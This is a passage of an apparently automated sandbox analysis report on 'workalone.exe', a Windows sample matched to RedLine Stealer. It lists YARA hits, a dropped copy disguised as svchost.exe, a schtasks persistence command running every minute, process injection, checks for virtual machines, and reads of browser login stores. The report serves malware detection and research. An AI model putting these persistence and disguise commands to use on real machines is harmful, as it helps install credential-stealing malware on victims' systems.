                    Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_054DDE10
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_054DD2F0
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_065E8440
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_065E8878
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_065E15A8
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 0_2_00F88220 CreateProcessAsUserA,
                    Source: workalone.exe, 00000000.00000002.267079536.00000000029F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
                    Source: workalone.exe, 00000001.00000000.262909550.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #l,\\StringFileInfo\\040904B0\\OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs workalone.exe
                    Source: workalone.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: svchost.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: workalone.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\workalone.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\workalone.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\workalone.exeFile created: C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE6B7.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/29@5/1
                    Source: tmp1B45.tmp.1.dr, tmpE6B7.tmp.1.dr, tmpB641.tmp.1.dr, tmpB611.tmp.1.dr, tmp8319.tmp.1.dr, tmp82DA.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: workalone.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\workalone.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\workalone.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6124:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
                    Source: workalone.exe, u0087u0003/u0095u0003.csCryptographic APIs: 'CreateDecryptor'
                    Source: workalone.exe, u0087u0003/u0095u0003.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.7.dr, u0087u0003/u0095u0003.csCryptographic APIs: 'CreateDecryptor'
                    Source: svchost.exe.7.dr, u0087u0003/u0095u0003.csCryptographic APIs: 'TransformFinalBlock'
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: workalone.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: workalone.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 0_2_00F81C57 push ebx; iretd
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.585773646811085
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.585773646811085

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with benign system names
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\workalone.exe TID: 5856Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\workalone.exe TID: 5660Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\workalone.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\workalone.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\workalone.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\workalone.exeWindow / User API: threadDelayed 9525
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\workalone.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\workalone.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\workalone.exeThread delayed: delay time: 922337203685477
                    Source: workalone.exe, svchost.exe.7.drBinary or memory string: objectmethodInvokenhffskdsfkdddafrffddhfscffdfhkgfsfdfdfhddrfahddsshcfchfdgeffkdafsfddhdshdghfBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresulthfsdkfdhgfshsefdfafffdchfhhfgsffrffdkdfcdshhfdasdfhfcfhdgadfdfrsfsshdkfffghhjfdffhfgadsfcrddfffskhjfsfhrgddddffffkhsjdfjsdfcfddshdfgfedfkfghjsddddffsheghddjffffffgjskdgsfacsafpsfhjfkfhgfhjsrfhddfhffadsfsfhsscfgdbddfrjfsffhgdfafcfdssfkfhgjffchkffgahffsrddsfsfjjffadsfcfdggsdehfsgkffjjcfssadghfffrfddsdgkfffffchkfhrfdfdafgsssffjjffaffffdrdgfhcsdsgkffjjcfhdsfrfgfdsadfsdgkffffgdddfdsfdhfssfdghfhfssddssdfhfddfhhshsfddsdfsdfdshshsdsffdsdsdfsdfsfhsdhffsdssfsshddsfgfsafsdgfsdshsgsfsfdsdgssdaffadssgsfashdsfsgfssadfsdggasdsfdfshsggdsdfafaghssddfdafsadsfdsfsddsjdddfsdsfgdfgfsssdfhjfsdsafdfhgjffddddsgfdgsjsfsddfdfjdffafgdfddsfddjkfdssfdfsgfhfssjfsffdfgsjfadsffffdfhfsfsfsjsffsfdssdjdsdffffsskwssffssdvgsffffsdsgffssfddsxstartupInfoSkikgmgIdajdfhfdfdffdffssdkfjhdfffdfhffsassdkfshhdffhdfsdhdffdfkdfaffdssdfffhhfhhsdfffdsshfffdhfhffdsffdfshfsdhshhhgfdffffdfsfhsfdfsffhfffdhsfddsffhssffdhdfffhhfdhsdffsfjhffsdffdfdhiCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerType
                    Source: workalone.exe, svchost.exe.7.drBinary or memory string: hfsdkfdhgfshsefdfafffdch
                    Source: C:\Users\user\Desktop\workalone.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_065EC798 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\workalone.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\workalone.exeMemory written: C:\Users\user\Desktop\workalone.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Users\user\Desktop\workalone.exe VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Users\user\Desktop\workalone.exe VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
